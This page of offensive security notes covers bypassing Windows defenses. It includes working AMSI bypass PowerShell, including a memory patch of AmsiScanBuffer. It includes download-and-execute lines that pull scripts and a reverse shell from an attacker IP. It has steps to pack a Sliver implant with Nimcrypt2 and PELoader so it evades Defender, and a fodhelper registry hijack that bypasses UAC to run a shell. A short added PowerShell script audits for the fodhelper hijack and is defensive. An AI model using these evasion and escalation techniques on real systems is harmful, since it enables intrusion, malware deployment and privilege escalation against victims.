
Bypassing Security


Last updated 1 year ago

AMSI

Powershell Only

$a = 'System.Management.Automation.A';$b = 'ms';$u = 'Utils'
$assembly = [Ref].Assembly.GetType(('{0}{1}i{2}' -f $a,$b,$u))
$field = $assembly.GetField(('a{0}iInitFailed' -f $b),'NonPublic,Static')
$me = $field.GetValue($field)
$me = $field.SetValue($null, [Boolean]"hhfff")

# Download and execute amsi.ps1 to bypass AMSI globally
IEX((New-Object System.Net.WebClient).DownloadString('http://10.10.14.5/amsi.ps1'))

Global

$Win32 = @"
using System;
using System.Runtime.InteropServices;
public class Win32 {
    [DllImport("kernel32")]
    public static extern IntPtr GetProcAddress(IntPtr hModule, string procName);
    [DllImport("kernel32")]
    public static extern IntPtr LoadLibrary(string name);
    [DllImport("kernel32")]
    public static extern bool VirtualProtect(IntPtr lpAddress, UIntPtr dwSize, uint flNewProtect, out uint lpflOldProtect);
}
"@

Add-Type $Win32

$LoadLibrary = [Win32]::LoadLibrary("am" + "si.dll")
$Address = [Win32]::GetProcAddress($LoadLibrary, "Amsi" + "Scan" + "Buffer")
$p = 0
[Win32]::VirtualProtect($Address, [uint32]5, 0x40, [ref]$p)
$Patch = [Byte[]] (0xB8, 0x57, 0x00, 0x07, 0x80, 0xC3)
[System.Runtime.InteropServices.Marshal]::Copy($Patch, 0, $Address, 6)

# Download and execute reverse shell or any other script
IEX((New-Object System.Net.WebClient).DownloadString('http://10.10.14.5/x.ps1'))

Windows Defender

For .NET (C#), PE or raw shellcode files, use Nimcrypt2:

nimcrypt -f INPUT.exe -t pe -s -e -o OUTPUT_enc.exe
  • -t sets the input file type
  • -e enables encryption

PELoader + pe2shc

We first convert the PE to shellcode:

> .\pe2shc.exe sliver_PE.exe

Next, we use PE_loader.exe to encrypt the shellcode:

> set hagrid=enc sliver_PE.shc.exe
> .\PELoader.exe
argument: enc sliver_PE.shc.exe
Encrypting File

This will output "sliver_PE.shc.exe.enc". Upload this file to the target together with PELoader.exe (renamed here to incendiumrocks.exe). Then set the environment variable again so the loader decrypts and executes the encrypted shellcode (our Sliver implant):

> set hagrid=mdll sliver_PE.shc.exe.enc
> .\incendiumrocks.exe

Done; check your listener in Sliver.

UAC

User Account Control (UAC) is a key part of Windows security. UAC reduces the risk of malware by limiting the ability of malicious code to execute with administrator privileges.

Check UAC settings

REG QUERY HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System\ /v ConsentPromptBehaviorAdmin

HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System
    ConsentPromptBehaviorAdmin    REG_DWORD    0x5

If the value is 5 (the default), Windows prompts the administrator for consent before running non-Windows binaries with high privileges.

Common bypass with AutoElevate

Some executables can auto-elevate, reaching a high integrity level (IL) without any user intervention. This applies to most of the Control Panel's functionality and to some executables shipped with Windows.

For an application to auto-elevate, some requirements need to be met:

  • The executable must be signed by the Windows Publisher
  • The executable must be located in a trusted directory, like %SystemRoot%/System32/ or %ProgramFiles%/

To check if a binary has autoElevate, we can use sigcheck:

C:\tools\> sigcheck64.exe -m c:/windows/system32/msconfig.exe
...
<asmv3:application>
	<asmv3:windowsSettings xmlns="http://schemas.microsoft.com/SMI/2005/WindowsSettings">
		<dpiAware>true</dpiAware>
		<autoElevate>true</autoElevate>
	</asmv3:windowsSettings>
</asmv3:application>

Fodhelper

Fodhelper.exe is one of the default Windows executables in charge of managing Windows optional features, including additional languages, applications not installed by default, and other operating system characteristics. Like most programs used for system configuration, fodhelper can auto-elevate under default UAC settings, so that administrators are not prompted for elevation when performing standard administrative tasks. Fodhelper can be abused without access to a GUI.

When Windows opens a file or URI scheme, it consults the registry to decide which application handles it; for fodhelper this is the ms-settings handler, and a per-user entry under HKCU takes precedence over the machine-wide one.

We can set the following keys for the fodhelper binary:

C:\> set REG_KEY=HKCU\Software\Classes\ms-settings\Shell\Open\command
C:\> set CMD="cmd.exe /c /windows/tasks/shell.exe"

C:\> reg add %REG_KEY% /v "DelegateExecute" /d "" /f
The operation completed successfully.

C:\> reg add %REG_KEY% /d %CMD% /f
The operation completed successfully.

And then proceed to execute fodhelper.exe, which in turn will trigger the execution of our reverse shell.

C:\> fodhelper.exe
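The two checks above (the ConsentPromptBehaviorAdmin value and the HKCU ms-settings handler) combined into one read-only audit script, as an added example that is not part of the original notes. It only uses the registry paths already shown on this page; the value descriptions follow Microsoft's documented UAC policy settings, and the commented remediation line is a suggestion, not something the page itself states.

```powershell
# Added audit example (not from the original notes). Read-only: reports the UAC
# admin prompt level and looks for the per-user ms-settings handler override that
# fodhelper.exe would honour. Run on the host under review; no elevation required.

$uacKey    = 'HKLM:\Software\Microsoft\Windows\CurrentVersion\Policies\System'
$hijackKey = 'HKCU:\Software\Classes\ms-settings\Shell\Open\command'

# Documented meanings of ConsentPromptBehaviorAdmin.
$promptLevels = @{
    0 = 'Elevate without prompting'
    1 = 'Prompt for credentials on the secure desktop'
    2 = 'Prompt for consent on the secure desktop (Always notify)'
    3 = 'Prompt for credentials'
    4 = 'Prompt for consent'
    5 = 'Prompt for consent for non-Windows binaries (default)'
}

function Get-UacAdminPromptLevel {
    $v = (Get-ItemProperty -Path $uacKey -Name ConsentPromptBehaviorAdmin -ErrorAction Stop).ConsentPromptBehaviorAdmin
    [pscustomobject]@{
        Value       = [int]$v
        Description = $promptLevels[[int]$v]
        # Only "Always notify" (2) makes Windows ignore the autoElevate manifest flag.
        AutoElevateHonoured = ([int]$v -ne 2)
    }
}

function Test-FodhelperHijack {
    if (-not (Test-Path $hijackKey)) {
        return [pscustomobject]@{ Present = $false; Command = $null; DelegateExecute = $false }
    }
    $props = Get-ItemProperty -Path $hijackKey
    [pscustomobject]@{
        Present         = $true
        Command         = $props.'(default)'   # the command fodhelper would launch
        # An empty DelegateExecute value next to a command is the tell-tale pair from above.
        DelegateExecute = ($null -ne $props.PSObject.Properties['DelegateExecute'])
    }
}

$uac = Get-UacAdminPromptLevel
Write-Output ("ConsentPromptBehaviorAdmin = {0} ({1})" -f $uac.Value, $uac.Description)
if ($uac.AutoElevateHonoured) { Write-Warning 'AutoElevate binaries such as fodhelper.exe run without a prompt at this level.' }

$h = Test-FodhelperHijack
if ($h.Present) {
    Write-Warning ("HKCU ms-settings handler override found: '{0}' (DelegateExecute present: {1})" -f $h.Command, $h.DelegateExecute)
    # Remediation (suggested, run deliberately): the legitimate handler lives under HKLM/HKCR,
    # so the per-user override can be removed outright:
    # Remove-Item -Path 'HKCU:\Software\Classes\ms-settings' -Recurse
} else {
    Write-Output 'No HKCU ms-settings\Shell\Open\command override present.'
}
```

A non-empty HKCU override is unusual on a normal workstation, so its mere presence is worth alerting on, independent of what command it points to.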

More bypasses with UACME

  • UACME, in its own words: "Defeating Windows User Account Control by abusing built-in Windows AutoElevate backdoor."

Before the PELoader + pe2shc steps, we first generate a Sliver implant and upload it to our Windows attacking host (not the target). We will need the two tools linked below, pe_to_shellcode and PELoader.

  • https://github.com/hasherezade/pe_to_shellcode
  • https://github.com/Hagrid29/PELoader
  • https://github.com/S3cur3Th1sSh1t/Amsi-Bypass-Powershell (Amsi-Bypass-Powershell: "This repo contains some Amsi Bypass methods i found on different Blog Posts.")
  • https://github.com/icyguider/Nimcrypt2 (Nimcrypt2: .NET, PE, & Raw Shellcode Packer/Loader Written in Nim)
  • https://github.com/hfiref0x/UACME (UACME: Defeating Windows User Account Control)